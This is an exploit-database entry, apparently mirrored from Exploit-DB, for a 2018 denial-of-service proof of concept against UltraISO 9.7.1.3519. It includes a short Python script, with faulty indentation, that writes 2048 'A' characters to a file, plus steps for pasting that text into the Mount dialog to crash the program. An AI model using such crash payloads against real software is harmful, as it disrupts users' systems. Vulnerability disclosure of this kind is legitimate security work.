header-logo
Suggest Exploit
vendor:
UltraISO
by:
Ali Alipour
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: UltraISO
Affected Version From: 9.7.1.3519
Affected Version To: 9.7.1.3519
Patch Exists: YES
Related CWE: N/A
CPE: a:ezbsystems:ultraiso
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 - 64-bit
2018

UltraISO 9.7.1.3519 – Denial Of Service (PoC)

UltraISO is vulnerable to a Denial of Service attack when a maliciously crafted file is opened. An attacker can exploit this vulnerability by creating a file with a large number of 'A' characters and then opening it in UltraISO. This will cause the application to crash.

Mitigation:

Users should avoid opening files from untrusted sources. Additionally, users should ensure that they are running the latest version of UltraISO.
Source

Exploit-DB raw data:

# Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : Alipour.it
# Date: 2018-08-22
# Vendor Homepage : https://www.ultraiso.com
# Software Link Download : https://www.ultraiso.com/download.html
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the UltraISO program. 
# In the new window click "Tools" > "Mount To Virtual Drive" . 
# Now Paste the content of "exploit.txt" into the field: " Image File ". 
# Click "Mount" and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 2048
	f = open ("exploit.txt", "w")
	f.write(buffer)
	f.close()